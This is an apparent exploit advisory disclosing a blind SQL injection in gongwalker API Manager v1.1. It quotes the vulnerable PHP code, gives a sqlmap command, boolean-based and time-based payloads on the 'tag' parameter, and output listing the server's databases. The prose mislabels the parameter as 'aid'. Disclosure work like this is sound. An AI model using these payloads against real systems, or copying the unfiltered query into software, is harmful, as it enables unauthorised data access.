Gongwalker API Manager version 1.1 suffers from a remote blind SQL injection vulnerability.
e2f59a1d01c9c7e0fd96cb821d1bfc82# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
# Date: 2017-05-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/gongwalker/ApiManager
# Software Link: https://github.com/gongwalker/ApiManager.git
# Version: v1.1
# Tested on: Debian
### Vulnerable
SQL Injection vulnerability exists in the execution of the sort function below.
The value entered with the aid parameter is executed as SQL qeury without being filtered.
- sort funcion in code-
case 'sort':
$sql = "select cname from cate where aid='{$_GET['tag']}' and isdel=0";
$menu = find($sql);
$menu = ' - ' . "<a href='".U(array('act'=>'api','tag'=>$_GET['tag']))."'>{$menu['cname']}</a>";
$file ='./MinPHP/run/sort.php';
break;
### sqlmap command
#> sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=sort&tag=2" --level 4 --no-cast --dbs
Parameter: tag (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=sort&tag=2' AND 5619=5619 AND 'Sknb'='Sknb
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=sort&tag=2' AND (SELECT * FROM (SELECT(SLEEP(5)))pkJT) AND 'tqrU'='tqrU
---
[16:25:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5.0.12
...
available databases [7]:
[*] gongwalker
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
....